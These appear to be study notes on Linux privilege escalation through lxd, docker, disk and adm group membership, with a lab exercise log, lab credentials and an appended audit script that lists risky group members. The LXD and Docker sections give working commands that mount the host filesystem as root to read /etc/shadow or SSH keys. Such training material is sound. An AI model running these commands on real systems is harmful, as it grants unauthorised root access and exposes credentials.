# LXC & LXD

- LXD is Ubuntu's container manager, which is similar to Docker
- Upon installation, all users are added to the `lxd` group
- Membership in this group can be used to privesc by creating an LXD container, making it privileged, and then accessing the host file system at `/mnt/root`
- To prepare for this attack, first confirm group membership, as these rights will be used to escalate to root, and unzip the target image for our container

```bash
id
unzip alpine.zip # we will run the alpine image in the LXD container
```

- Second, start the LXD initialization process and import the image
  - Choose the defaults for each prompt
  - Consult this [post](https://www.digitalocean.com/community/tutorials/how-to-set-up-and-use-lxd-on-ubuntu-16-04) for more information on each step

```bash
lxd init
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
```

- Now, create a privileged container with `security.privileged` set to `true` to run the container without a UID mapping, making the root user in the container the same as the root user on the host

```bash
lxc init alpine r00t -c security.privileged=true
```

- Next, and most importantly, mount the host file system

```bash
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
```

- Finally, spawn a shell inside the container instance
- Now we are able to browse the mounted host file system as `root`
- For example, to access the contents of the root directory on the host, type `cd /mnt/root/root`
- From the container, we can read sensitive files such as `/etc/shadow` and obtain password hashes, or gain access to SSH keys in order to connect to the host system as root, and more

```bash
devops@NIX02:~$ lxc start r00t
devops@NIX02:~/64-bit Alpine$ lxc exec r00t /bin/sh
~ # id
uid=0(root) gid=0(root)
~ #
```

# Docker

- Similar to above, the placement of a user into the `docker` group is equivalent to root-level access to the file system without requiring a password
- Members of the `docker` group can spawn new Docker containers
- As one example, we can run the command below

```bash
docker run -v /root:/mnt -it ubuntu
```

- This command creates a new Docker instance with the `/root` directory on the host file system mounted as a volume
- Once the container is started, we are able to browse the mounted directory and retrieve or add SSH keys for the root user
- This could be done for other directories such as `/etc` in order to retrieve the contents of the `/etc/shadow` file for offline password cracking or adding a privileged user

# Disk

- Users within the `disk` group have full access to any devices contained within `/dev`, such as `/dev/sda1`, which is typically the main device used by the operating system
- NOTE: An attacker with these privileges can use `debugfs` to access the entire file system with root-level privileges
- As with the Docker group example, this could be leveraged to retrieve SSH keys, credentials, or to add a user

# ADM

- Members of the `adm` group are able to read all logs stored in `/var/log`
- This does not directly grant root access, but could be leveraged to gather sensitive data stored in log files or enumerate user actions and running `cron` jobs

----

# Exercise

- `ping` test ![[images/Pasted image 20260204195900.png]]
- `nmap` scans ![[images/Pasted image 20260204200027.png]]
- `ssh` into the box with the given creds `secaudit:Academy_LLPE!` ![[images/Pasted image 20260204200039.png]]
- light local enum on the box ![[images/Pasted image 20260204200104.png]]
- we have `adm` privs
- review `/var/log` because we have `adm` privs ![[images/Pasted image 20260204200348.png]]
- run a `find` within `/var/log` for `flag` ![[images/Pasted image 20260204200838.png]]
- recursively run `ls` and `grep` for flag ![[images/Pasted image 20260204200831.png]]
- let's find all files readable by the `adm` group, i.e. all log files ![[images/Pasted image 20260204201152.png]]
- let's try the recursive `ls` command above piped to `xargs cat | grep -i flag` ![[images/Pasted image 20260204201429.png]]
- similar to above, let's try to `grep` against `/var/log` with the recursive command below

```bash
grep -rw "flag" /var/log
```

![[images/Pasted image 20260204201650.png]]
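As an added defender-side example (not part of the original note), here is a small audit script that reads a file in `/etc/group` format and reports every member of the four groups covered above, `lxd`, `docker`, `disk` and `adm`, so an administrator can spot who holds root-equivalent or log-reading rights. The sample group file is constructed, and the group list and function names are my own choices.

```bash
#!/usr/bin/env bash
# Audit helper: list users who are members of groups whose membership is
# equivalent to, or close to, root on the host (see the sections above).
# Only supplementary members from /etc/group are checked; a user whose
# primary group (in /etc/passwd) is one of these would not be reported.

# Groups discussed in this note; extend as needed for your environment
risky_groups="lxd docker disk adm"

# Constructed sample in /etc/group format (not taken from a real host)
SAMPLE_GROUP_FILE=$(cat <<'EOF'
root:x:0:
adm:x:4:syslog,secaudit
disk:x:6:
lxd:x:108:devops
docker:x:999:devops,ci
users:x:100:
EOF
)

# audit_groups <group-file-content>
# Prints one "<group>:<user>" line per member of a risky group.
audit_groups() {
    printf '%s\n' "$1" | while IFS=: read -r name pw gid members; do
        # Skip groups that are not in the watch list
        case " $risky_groups " in
            *" $name "*) ;;
            *) continue ;;
        esac
        # Skip risky groups with no supplementary members
        [ -z "$members" ] && continue
        # The member field is comma separated
        printf '%s\n' "$members" | tr ',' '\n' | while read -r user; do
            [ -n "$user" ] && printf '%s:%s\n' "$name" "$user"
        done
    done
}

# count_findings <group-file-content>
# Number of (group,user) pairs that should be reviewed.
count_findings() {
    audit_groups "$1" | wc -l | tr -d ' '
}

# Demonstration on the constructed sample; on a real host use:
#   audit_groups "$(cat /etc/group)"
audit_groups "$SAMPLE_GROUP_FILE"
```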